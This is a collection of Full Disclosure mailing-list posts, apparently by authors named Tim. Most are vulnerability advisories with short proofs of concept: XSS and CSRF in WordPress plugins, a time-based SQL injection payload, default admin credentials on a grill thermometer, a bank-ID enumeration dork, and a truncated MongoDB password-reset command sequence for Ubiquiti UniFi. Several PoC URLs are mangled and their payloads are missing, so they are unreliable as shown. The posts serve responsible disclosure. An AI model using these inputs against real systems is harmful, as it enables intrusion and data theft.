Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check

[Tim]

What's the issue here exactly? An attacker can just prevent an the in app
update check from realizing it needs to nag the user?

The actual update logic and update-ability is controlled through the Play
Store, no?

-Tim Strazzere


On Tue, Nov 26, 2019 at 10:27 AM David Coomber <
davidcoomber.info...@gmail.com> wrote:

> Anhui Huami Mi Fit Android Application - Unencrypted Update Check
> --
> https://www.info-sec.ca/advisories/Huami-Mi-Fit.html
>
> Overview
>
> "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts."
>
> (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health)
>
> Issue
>
> The Anhui Huami Mi Fit Android application (version 4.0.10 and below),
> does not encrypt the connection when it checks for an update.
>
> Impact
>
> An attacker who can monitor network traffic may be able to tamper with
> the application's update function.
>
> Timeline
>
> October 21, 2019 - Attempted to obtain a security contact via an email
> to supp...@amazfit.com
> October 22, 2019 - Provided the details to CERT/CC
> October 23, 2019 - CERT/CC opened a case for tracking
> November 4, 2019 - Attempted to obtain a security contact via an email
> to secur...@xiaomi.com
>
> Solution
>
> Upgrade to version 4.0.11 or later
>
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Hard-coded credentials on ProGrade/Lierda Grill Temperature Monitor [CVE-2019-15304]

[tim]

[Author:] Tim Tepatti
[Website:] tepatti.com

[Title:] Hard-coded credentials on ProGrade/Lierda Grill Temperature
Monitor [CVE-2019-15304]

[Product:] Grill Temperature Monitor
[Manufacturer:] ProGrade / Lierda
[Affected Version(s):] V1.00_50006
[Tested Version(s):] V1.00_50006
[Vulnerability Type:] Use of hard-coded credentials (CWE ID 798)
[CVE Reference:] CVE-2019-15304


[TL;DR:]

ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default
password of admin for the admin account, which allows an attacker to
cause a Denial of Service or Information Disclosure via the
undocumented access-point configuration page located on the device.

[Long Info:]

ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default
password of admin for the admin account, which allows an attacker to
cause a Denial of Service or Information Disclosure via the
undocumented access-point configuration page located on the device.

The access point configuration page is never made known to the end
user - the user is never supposed to access it or change any of the
options, and as such, the end user has no idea that an attacker could
access this page. This is different than a normal access point or
internet router where the administration page is required for setup
and configuration, and the end user is made aware of the risk of
default credentials. This makes the vulnerability more severe because
the attack vector is something which the end user wasn't aware even
operated on their device.

Additionally, there were two vendors provided because Lierda is a
wholesaler who actually created the device, and ProGrade simply
re-branded the device for the American market. This way, both
customers will be aware of the security vulnerabilities in the
product.

[Technical Info:]

[Default Web Server IP:] 11.11.11.254
[Default Web Server Port:] 80

[Reference(s):] http://progradegrill.com/wifi-grilling-thermometer/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Multiple banks - potential risk of an inconsequent client separation

[Tim Schughart]

Hello together, 

as many of you already know some german banks are sharing the same hoster. 

Via google dorking it is possible to determine some customers of one of those 
hosters (Fiducia & GAD IT AG). 

The hoster uses a GET parameter called „bankid“ to identify its customers. 

For example: 
https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal? 
<https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal?bankid=8008>bankid=8008
 <https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal?bankid=8008> 

With help of google dorking „inurl:WebPortal?bankid=„ it is possible to 
enumerate all banks which host their online banking service at Fiducia & GAD IT 
AG. 
We checked this via whois on the ip net ranges - where another mistake is done 
- net name „GAD“ in all whois records. 

Another indicator for a shared environment (at least some shared systems) is 
changing the banking id shown in the following example:
https://www.apobank.de/ptlweb/WebPortal?bankid=8008 
<https://www.apobank.de/ptlweb/WebPortal?bankid=8008> 
changed to:
https://www.apobank.de/ptlweb/WebPortal?bankid=8007 
<https://www.apobank.de/ptlweb/WebPortal?bankid=8007> 
redirects to https://www.vr.de/privatkunden.html 
<https://www.vr.de/privatkunden.html> 

In Germany and the EU it is given by law that you have to separate clients data 
because, e.g. EU-DSGVO. For banks especially BAFIN audits this, too.  

On the following link you’ll find a cleaned list of dork double results, where 
are around 85 banks are listed with their bankid. 
https://data.prosec-networks.com/d/7cf20ee4b17e44ccb402/?dl=1 
<https://data.prosec-networks.com/d/7cf20ee4b17e44ccb402/?dl=1> 

In our oppinion the separation is not given properly, what do you guys think 
about this? 


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec GmbH
Robert-Koch-Straße 1-9
56751 Polch 

Website: https://www.prosec-networks.com 
Phone: +49 (0)261 450 930 90

Sitz der Gesellschaft / company domiciled in: Polch
Registergericht / registry court: Amtsgericht Koblenz, HRB 26457
Geschäftsführer / chief executive: Tim Schughart
USt-IdNr./ VAT ID: DE321817516

“This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail.

“Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] YOP Poll 6.0.2 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software: [YOP Poll](https://wordpress.org/plugins/yop-poll/)
  * Affected Version: 6.0.2
  * Patched Version: 6.0.3
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/26/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The YOP poll WordPress plugin is vulnerable to reflected XSS as it
echoes the poll_id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=yop-polls=view-votes_id=1'">

# Timeline

- 10/25/2018 Requested email address via contact form
- 10/25/2018 Vendor responds, advisory sent
- 11/26/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-yop-poll-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WP Live Chat Support 8.0.17 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software: [WP Live Chat
Support](https://wordpress.org/plugins/wp-live-chat-support/)
  * Affected Version: 8.0.18
  * Patched Version:
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/31/2018
  * Vendor Fix: 11/01/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS
as it echoes the term parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page='">

# Timeline

- 10/31/2018 Requested email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 11/01/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wp-livechat-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software:
[wpGoogleMaps](https://wordpress.org/plugins/wp-google-maps/)
  * Affected Version: 7.10.41
  * Patched Version: 7.10.43
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 10/31/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it
echoes PHP_SELF without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php/'">?page=wp-google-maps-menu=foo

# Timeline

- 10/25/2018 Sent advisory
- 10/25/2018 Vendor confirms and releases fix
- 10/25/2018 Suggested improvement for fix
- 10/31/2018 Vendor releases improved fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NextScripts: Social Networks Auto-Poster 4.2.7 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software: [NextScripts: Social Networks
Auto-Poster](https://wordpress.org/plugins/social-networks-auto-poster-facebook-twitter-g/)
  * Affected Version: 4.2.7
  * Patched Version: 4.2.8
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/02/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Social Networks Auto-Poster WordPress plugin is vulnerable to
reflected XSS as it echoes the `item` parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=nxssnap-reposter=edit=24'">

# Timeline

- 10/25/2018 Requested email address via contact form
- 10/29/2018 Vendor supplies email address
- 10/31/2018 Advisory sent
- 11/02/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-social-networks-auto-poster-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] KingComposer 2.7.6 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software:
[KingComposer](https://wordpress.org/plugins/kingcomposer/)
  * Affected Version: 2.7.6
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The KingComposer WordPress plugin is vulnerable to reflected XSS as it
echoes the id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper=<%2Fscript>

[FD] Give 2.3.0 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software: [Give](https://wordpress.org/plugins/give/)
  * Affected Version: 2.3.0
  * Patched Version: 2.3.1
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 11/24/2018
  * Vendor Fix: 12/13/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Give WordPress plugin is vulnerable to reflected XSS as it echoes
various parameter without proper encoding.

# Proof of Concept


http://localhost/wordpress/wp-admin/edit.php?post_type=give_forms=give-tools=import=import_donations=3%5B0%5D=email%5B1%5D=first_name%5B2%5D=amount%5B3%5D=form_id='">

# Timeline

- 11/24/2018 Asked for email address via contact form
- 11/24/2018 Vendor responds, advisory sent
- 12/13/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-give-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Font_Organizer 2.1.1 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software:
[Font_Organizer](https://wordpress.org/plugins/font-organizer/)
  * Affected Version: 2.1.1
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Font_Organizer WordPress plugin is vulnerable to reflected XSS as it
echoes the manage_font_id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/options-general.php?manage_font_id='">=font-setting-admin

# Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-font-organizer-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Contact Form Email 7.10.41 - Reflected XSS & CSRF (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS & CSRF
  * Affected Software: [Contact Form
Email](https://wordpress.org/plugins/contact-form-to-email/)
  * Affected Version: 1.2.65
  * Patched Version: 1.2.66
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/31/2018
  * Vendor Fix: 10/31/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

## Reflected XSS

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Contact Form Email WordPress plugin is vulnerable to reflected XSS
as it echoes the item parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1='">

# Code

contact-form-to-email/cp_admin_int_edition.inc.php
" />


## CSRF (to XSS)

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The plugin allows the addition of custom JavaScript to forms. Because
the request to place this addition is not protected against CSRF, an
attacker can place arbitrary JavaScript into the application if an
authenticated user visits a webpage containing malicious HTML and/or
JavaScript.

# Proof of Concept


  
http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1=js;
method="POST">
  
  
  
  
  

  



# Timeline

- 10/31/2018 Asked for email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 10/31/2018 Vendor releases fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-contact-form-email-xss-csrf/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Blog2Social 5.0.2 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software:
[Blog2Social](https://wordpress.org/plugins/blog2social/)
  * Affected Version: 5.0.2
  * Patched Version: 5.0.3
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/13/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Blog2Social WordPress plugin is vulnerable to reflected XSS as it
echoes the b2s_update_publish_date parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=blog2social-ship=70_action=1_update_publish_date='">

# Timeline

- 10/25/2018 Sent advisory
- 10/26/2018 Vendor confirms recipt of advisory
- 11/13/2018 Vendor releases fix
- 02/05/2019 Confirmed Fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-blog2social-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Quiz And Survey Master 6.0.4 - Reflected XSS (WordPress Plugin)

[Tim Coen]

  * Vulnerability: XSS
  * Affected Software: [Quiz And Survey
Master](https://wordpress.org/plugins/quiz-master-next/)
  * Affected Version: 6.0.4
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Quiz And Survey Master WordPress plugin is vulnerable to reflected
XSS as it echoes the quiz_id parameter without proper encoding.

# Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=mlw_quiz_results_id='">

# Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-quiz-and-survey-master-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Forminator 1.5.4 - Unauthenticated Persistent XSS, Blind SQL Injection (WordPress Plugin)

[Tim Coen]

  * Vulnerability: Unauthenticated Persistent XSS, Blind SQL Injection
  * Affected Software:
[Forminator](https://wordpress.org/plugins/forminator/)
  * Affected Version: 1.5.4
  * Patched Version: 1.6
  * CVE: not requested
  * Risk: High
  * Vendor Contacted: 11/25/2018
  * Vendor Fix: 12/10/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

## Unauthenticated Persistent XSS via poll

# CVSS

7.2 High
[CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)

# Details

Custom fields of a poll are not properly encoded when showing results of
a poll, leading to persistent XSS.

# Proof of Concept

Prerequisite: create a poll, add a custom input field, publish the poll.

An attacker can place the payload - for example `'">` - in the custom input field.

To trigger the payload, view the submissions of the poll.


## Authenticated Blind SQL Injection: Delete Submission

# CVSS

High 8.1
[CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H)

# Overview

The action of deleting submissions is vulnerable to blind SQL injection.
An attacker can exploit this to extract data from the database.

An account with the permission to delete submissions is required.

# Proof of Concept

- View submissions, eg at
http://192.168.0.103/wordpress/wp-admin/admin.php?page=forminator-entries_type=forminator_forms_id=133
- check the checkbox of one submission, use bulk action -> delete entries
- apply the action and intercept or replay the request
- change the `entry[]` value to contain an SQL payload, eg:
1) or sleep(5)--x-


# Timeline

- 11/25/2018 Asked for email address via contact form
- 11/25/2018 Vendor responds, advisory sent
- 12/10/2018 Vendor releases fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-forminator-persistent-xss-blind-sql-injection/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

[Tim]

Hi Erik,

Thanks for backing me up on a number of things.  Only one response below.


> > In light of that, there's
> > nothing particularly wrong with using CBC, if it is implemented well.
> > At least, using it is not *more* wrong than using OFB, CFB, or CTR
> 
> That is wrong. CBC mode allows attacks such as "Sweet32"
> (https://sweet32.info/), which is not possible with CTR mode.

The site you linked mentioned 64bit block ciphers are vulnerable, even
in CTR mode.  Obviously the birthday "paradox" applies. Regardless of
how right or wrong you are about Sweet32, this far from the most
important thing *implementors* should be worried about.  Obviously if
they start with AES, then the birthday paradox issues are vastly
reduced.  Any new system should be avoiding the likes of 3DES,
Blowfish, etc.  So it seems moot.


On the flip side, tell me what the impact is of these two scenarios
where a developer follows *some* of our advice:

(A) They use AES in CBC mode and apply an HMAC to the cipehrtext.
They actually validate that HMAC before decrypting.  However, they
fail to use a unique IV for every message.

(B) They use AES in CTR mode and apply an HMAC to the cipehrtext.
They actually validate that HMAC before decrypting.  However, they
fail to use a unique IV for every message.


Which is worse?  Obviously (B) fails pretty catastrophically.  (A) is
not great, but at least the plaintext isn't nearly as easy to expose
(usually only minor block-level information leaks).  In the real world
I see these kinds of mistakes all of the time.  So be careful of
steering people toward a mode that doesn't degrade as gracefully when
developers make mistakes.  They invariably will do so, unless they've
spent as much time with crypto as you and I.

tim


PS- And to re-iterate, we shouldn't ask them to use any particular
cipher mode, but instead to use something off the shelf.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

[Tim]

>  > res = apr_crypto_passphrase(, , passphrase,
>  > strlen(passphrase), (unsigned char *) (), sizeof(apr_uuid_t),
>  > *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
> 
> CBC. Again.
> 
> The earliest mention of CFB which I know is dated 1989.
> The earliest mention of CTR which I know is dated 1990-ies.
> 
> But there still are people who use CBC...
> 
> Please, PLEASE, PPLAASSSE don't use it. Instead, use either
> Blowfish in CFB mode or at least Rijndael (AES) in CTR (or GCM)
> mode - both are available, for example, in the OpenSSL library.

All traditional modes that lack integrity protection are vulnerable to
chosen-ciphertext attacks in these kinds of scenarios.  CFB isn't
immune and CTR is catastrophically weak.  All traditional modes need a
MAC or similar integrity protection.  In light of that, there's
nothing particularly wrong with using CBC, if it is implemented well.
At least, using it is not *more* wrong than using OFB, CFB, or CTR
without integrity protection.

GCM is fine if the implementation is sound and the IVs never repeat,
but there are pitfalls.  We should instead be pointing developers in
the direction of using something off-the-shelf, such as libsodium.
Much less room for error.

tim

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Ubiquiti

[Tim Schughart]

Hi,

please let us communicate directly and not via Mailinglists, because this 
results in flooding and is not important to all other people. If there is an 
final result, weather the PoC has got an mistake or not, we can publish the 
result. 

If there are other products affected we don’t know - this was not mentioned in 
the disclosure (The PoC is only for the OS X Software combined with an AP AC 
Lite), so we can’t give an statement to other products of the vendor. 

If nobody is able to get the PoC working, like I said above, maby we made an 
mistake, I will not distance me from making a mistake, I think the vuln should 
not be seen as too critical. 

But what you all approved is that if the database runs locally the following 
scenario should be bullet proof: 
All, by the management software, managed devices could be compromised if the pc 
get’s infected, because the database has absolutely no authentication and you 
are able to reset the local admins web interface password. 

This would reduce the CVSSv3 to 6.3 and change they vuln type to „privilege 
escalation“, combined with broken authentication even without an "scope 
change": 
CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H 

Do you agree? 

I’m looking forward to minimize our "race time condition denial of service", to 
deliver fast results in future :-P 


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K.
Ellingshohl 82
56076 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schugh...@prosec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, 
HRA 21621.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 
21621."









___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Critical Vulnerability in Ubiquiti UniFi

[Tim Schughart]

Hi Carlos, 

you are correct that mongo is bound to 127.0.0.1 only. But you are able to get 
it remote if you are using the Unify Controller Software. 

So the db gets tunneled to your device. 

Test environment: 
1. I have configured the AP to our network. 
2. I have removed every piece of software for configuring the ap. 
3. I have installed the Unify Manager (for Mac 5.2.7.)
4. I’m able to connect to the database via 127.0.0.1 

Network topology: 
The access point is cabled to a AVM FritzBox. Our test client is connected via 
W-Lan provided by FritzBox - so there is no direct connection to the ap.  


Best regards
Tim Schughart
 
> Am 01.10.2016 um 15:30 schrieb Carlos Silva <r3...@r3pek.org>:
> 
> Hi Tim!
> 
> I can be missing something here but I just checked this on a fresh installed 
> Unifi Controller and mongod is binding to localhost making this a non-issue. 
> Or, you have to get a remote shell first before you can get a connection to 
> the DB. Am I missing something?
> 
> Thanks,
> Carlos Silva
> 
> On Fri, Sep 30, 2016 at 10:49 AM, Tim Schughart 
> <t.schugh...@prosec-networks.com> wrote:
> Hello @all,
> 
> together with my colleague we found two uncritical vulnerabilities you'll 
> find below.
> 
> Product: UniFi AP AC Lite
> Vendor: Ubiquiti Networks Inc.
> 
> Internal reference: ? (Bug ID)
> Vulnerability type: Incorrect access control
> Vulnerable version: Unify 5.2.7 and possible other versions affected (not 
> tested)
> Vulnerable component: Database
> Report confidence: yes
> Solution status: Not fixed by Vendor, the bug is a feature.
> Fixed versions: -
> Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec 
> Networks
> Solution date: -
> Public disclosure: 2016-09-30
> CVE reference: CVE-2016-7792
> CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
> 
> 
> Vulnerability Details:
> You are able to connect to the access points database, because of an broken 
> authentication (OWASP TOP10). So you are able to modify the database and read 
> the data. An possible scenario you'll find in PoC section.
> 
> Risk:
> An attacker gets access to the database and for e.g. is able to change the 
> admins password, like you see in PoC below.
> 
> PoC:
>  1. Generate SHA512 Hash with e.g.
>  mkpasswd -m sha-512
> 
>  2. Connect via network to database, e.g. :
>  mongo --port 27117 --host target_ip
> 
>  3. Change password via command
>  "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
